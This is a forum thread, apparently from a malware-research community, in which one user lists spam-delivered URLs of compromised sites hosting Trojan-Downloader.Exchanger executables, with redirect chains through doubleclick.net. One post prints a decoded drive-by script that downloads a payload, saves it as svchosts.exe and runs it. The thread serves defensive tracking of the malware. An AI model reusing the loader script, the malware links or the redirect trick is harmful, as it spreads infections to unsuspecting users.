Thread about Exchanger sites

[bobby]

I'll post here the links to sites infected with Trojan-Downloader.Exchanger.xx

I get the links from spam emails. All of the mails are about some video (Britney caught naked etc.)

Code: [Select]

http://thebrits.cl/index.php
>
http://thebrits.cl/pindex.php  < a script, see bellow
http://thebrits.cl/wamkl.gif
http://thebrits.cl/video_new.exe

http://thebrits.cl/pindex.php
>
http://thebrits.cl//load.php   < exe file

[JohnC]

Thank you.

[bobby]

The list of previous Exchanger URLs (recovered from Malzilla's cache):

Code: [Select]

http://www.b-created.be/images/xyt/video_free.exe
http://logistixmedia.com/images/video/video_int.exe
http://rockaina.com/video.exe
http://justleopold.com/video.exe
http://remotes.ch/video.exe
http://www.ufg.asso.fr/video.exe
http://normrestorasyon.com/video.exe
http://www.sural-autoparts.com/video.exe
http://www.bambinidimanina.org/video.exe
http://iberseas.com/video.exe
http://mitoltd.com.tr/video.exe
http://studiogsm.pl/video.exe
http://flet.za.pl/video.exe
http://www.vallejo.onored.com/video.exe
http://www.photokeepsake.co.uk/video.exe
http://abakos.com.es/video.exe
http://simon.lermen.de/video.exe
http://tellover.com/video.exe
http://jungschar-stthekla.at/video.exe
http://beaukaye.com/video.exeProbably all of them are dead by now.

[JohnC]

Thanks.

[bobby]

Code: [Select]

http://www.cronicasdecaracas.com/for_y.php
> http://www.cronicasdecaracas.com/main34.html
>>http://www.cronicasdecaracas.com/pindex.php
>>http://www.cronicasdecaracas.com/untitled.gif
>>http://www.cronicasdecaracas.com/for_you.exe

http://www.cronicasdecaracas.com/pindex.php  <-- fake 404 with JS
>http://www.cronicasdecaracas.com//load.php  <-- payload, exe file

Decoded script:

poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','cl');
var asst = ender.CreateObject('adT','http://www.cronicasdecaracas.com//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}


[bobby]

Code: [Select]

http://expotech.es/video.exe

[JohnC]

Thanks.

[bobby]

New one.

Code: [Select]

http://ad.doubleclick.net/click;h=nfuit;~sscs=%3fhttp://bottegadelpesto.com/video.exe
This time I gave the link in the form it was in spam mail.
Earlier links in this thread also contained redirections, but through Google.
This one uses new redirection - through doubleclick.net

[JohnC]

Thanks.

[bobby]

Code: [Select]

http://do-haguenau.com/index1.php
>http://do-haguenau.com/main34.html
>>http://do-haguenau.com/pindex.php  <<-- fake 404, JavaScript
>>http://do-haguenau.com/wamkl.gif
>>http://do-haguenau.com/video_film.exe  <<-- payload

http://do-haguenau.com/pindex.php
>http://do-haguenau.com//load.php  <<-- payload
Same scheme like in one from the previous cases

[bobby]

Code: [Select]

http://www.quinotizie.info/video.exeDoubleclick.net redirection used

Code: [Select]

http://ad.doubleclick.net/click;h=IKgZj;~sscs=%3fhttp://www.quinotizie.info/video.exe

[bobby]

Code: [Select]

http://www.blumedit.it/video.exeDoubleclick.net redirection is used in spammed link:

Code: [Select]

http://ad.doubleclick.net/click;h=SLrjj;~sscs=%3fhttp://www.blumedit.it/video.exe

[JohnC]

Thanks.

[bobby]

Code: [Select]

http://clubnauticoliva.com/video.exeIt was using redirection through Doubleclick.net

Code: [Select]

http://ad.doubleclick.net/click;h=FMKqg;~sscs=%3fhttp://clubnauticoliva.com/video.exe

[JohnC]

Thanks.